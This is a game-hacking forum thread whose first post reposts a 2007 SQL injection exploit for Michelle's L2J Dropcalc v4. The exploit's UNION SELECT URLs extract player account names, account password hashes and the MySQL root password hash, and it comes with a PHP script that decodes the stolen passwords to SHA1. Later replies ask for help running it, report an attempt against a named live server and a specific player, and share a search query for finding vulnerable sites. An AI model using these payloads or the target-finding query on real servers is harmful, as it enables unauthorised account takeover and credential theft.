[Exploit] SQL Injection!

[caesar4l2]

#==============================================================================================
#  Title: Michelle's L2J Dropcalc
#  Version: <= v4
#  Web Site: http://www.msknight.com/comps/lineage2/myl2jdropcalc.htm
#
#  Discovered By: Codebreak (codebreak1984@gmail.com | www.codebreak.tk)
#
#==============================================================================================
#  SQL Injection: (*** Must be logged in, using your own username and Token ***)
#
#  http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=[sql]
#
#  Example:
#
#   Obtain a player username:
#   http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,account_name,null,null,null,null,null from characters where char_name = "[PLAYER]"
#
#   Obtain a password for that username (*** encrypted): 
#    * only valid if loginserver and gameserver are in the same machine
#   http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,password,null,null,null,null,null from accounts where login = "[uSERNAME]"
#
#
#  Bonus:
#   
#   Obtain MYSQL Password (encrypted):
#    *only valid if the script is executed with root accounts.
#   http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,Password,null,null,null,null,null from mysql.user where User = "root" and host="localhost"
#
#   *** L2J Encrypted Password can be decoded into a SHA1 hash. I've made a script to do that and it's included in this file
#
###############################################################################################


<--------- Beginning of PHP Script --------->

<style type="text/css">
<!--
.style3 {font-size: 24px}
.style1 {color: #CC0000}
-->
</style>
<?
echo("<title>L2J Pass Decoding - POC</title>");
$pass = $_POST['decode']; 
$unpass3 = base64_decode($pass);


$array = unpack("H*", $unpass3);
foreach ($array as $key => $value)
$unpass2 = $array[1];


echo("<span class=style1><b><u>Decoding Password</u></b></span>");

echo("<br><b>Base 64:</b> $pass<br>");
echo("<b>Unpacked:</b> $unpass3<br>");
echo("<br><b>SHA1:</b> $unpass2<br>");
?>
<form name="form1" method="post" action="">
  <div align="center">
    <input type="text" name="decode">
    <input type="submit" value="Decode">
  </div>
</form>
<br><br><br><center><i>Created by Codebreak</center></i>

<------------- End of Script ------------->

# milw0rm.com [2007-01-31]

 

c/p from milworm, notice that i've not made it to work if someone make it work pls share the how-to

i've tried on www.cfl2.eu but i think i'm missing something.. dunno what btw!

 

the guide is in code tag, however i report i t here:

This exploit can be used by Web Browser only for server which supports and have Michelle's L2J Dropcalc running:

#  SQL Injection: (*** Must be logged in, using your own username and Token ***)

#

#  http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=

#

#  Example:

#

#   Obtain a player username:

#   http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,account_name,null,null,null,null,null from characters where char_name = "[PLAYER]"

#

#   Obtain a password for that username (*** encrypted):

#    * only valid if loginserver and gameserver are in the same machine

#   http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,password,null,null,null,null,null from accounts where login = "[uSERNAME]"

#

#

#  Bonus:

#   

#   Obtain MYSQL Password (encrypted):

#    *only valid if the script is executed with root accounts.

#   http://[Target]/[Path]/i-search.php?itemid=&username=[user]&token=[Token]&langval=lang-eng.php&server_id=0&skin_id=0&itemid=-1 UNION select null,Password,null,null,null,null,null from mysql.user where User = "root" and host="localhost"[/b]

 

as you can see is pretty easy to do, just I don't get it to work, hope someone can help

asap i've decreased post to 500 :P

 

EDIT: decreased again, pls someone try this..

 

caesar

[Frank]

Well it would e usefull if you explain us how to use it? .. Also 1000 posts are too many...

[Medson™]

omg 1000 posts ... n/c xD

[GrisoM]

omg 1000 posts ... n/c xD

 

Keep spamming n/c u will see ;)

 

XxRxX u know how SQL Injection works no? if u dont have bad memory there it was an explanations some where over the forum

 

@caesar4l2

 

any way give us 1 mini guide of how to use it ;P If this even work in 1 server i think u could be rewarded

 

[caesar4l2]

Well it would e usefull if you explain us how to use it? .. Also 1000 posts are too many...

 

The guide is in Code tag... however i'll write it, give me a sec lol

 

[caesar4l2]

 

EDIT: decreased post needed again, now to 50, pls someone try this..

[bonesaw]

That's ancient. Just check the release date.

2007-01-31

 

Plus, it's for very specific L2J servers with a web server that will allow SQL injection. Too specific exploit... don't think it's gonna work anywhere. For a successful SQL injection, you must craft your own queries, those c/p stuff won't work unless it details on which application this is used for and what version... very, very specific.

[caesar4l2]

That's ancient. Just check the release date.

2007-01-31

 

Plus, it's for very specific L2J servers with a web server that will allow SQL injection. Too specific exploit... don't think it's gonna work anywhere. For a successful SQL injection, you must craft your own queries, those c/p stuff won't work unless it details on which application this is used for and what version... very, very specific.

 

i think that if the server you play on its not too much customized and GMs are a little bit "stupid" the trick is easy to do

 

for example the server in which i tried is using l2jfree so in place of "name"  i must put "char_name" as in characters.sql table is shown

 

and, yes its old, but Michelle's L2J Dropcalc its still at the same versione (4 at least for the server I mentioned in 1st post)

 

so thats it, no one wonna try? XD

[Philipe]

explain better please!

[caesar4l2]

you can't even read the post get lost :|

[bonesaw]

Well.. if you google for "inurl:i-search.php dropcalc" you'll find a few servers using it... ;)

Not gonna try it, I don't like L2J servers anyway... but a few servers still use it, maybe it'll still work..

[GrisoM]

[hide]

Well.. if you google for "inurl:i-search.php dropcalc" you'll find a few servers using it... ;)

Not gonna try it, I don't like L2J servers anyway... but a few servers still use it, maybe it'll still work..

 

Results 1 - 7 Of 7

 

xD well if u say this is usless ..

 

m.. ok then if u find a server just tell us xD

[caesar4l2]

 

almost all chronicle, the server i'm trying in its gracia and the version of the dropcalc its stil the v4 so compatible with this milworm --> however i'm not that much experienced with sql injection, i've tried this link (injection):

 

http://dropcalc.cfl2.eu/i-search.php?username=[myuser]&token=[mytoken]&langval=0&server_id=1&skin_id=0&itemid=-1%20UNION%20select%20accout_name%20from%20characters%20where%20char_name%20=%20"juda"

 

still nothing, the page is still loading from alike an hour lol (the %20 are spaces in Ieexplorer 7 it write them like that lol)

[thanhtam80]

i don't think it userfull

[Makyura]

it still work?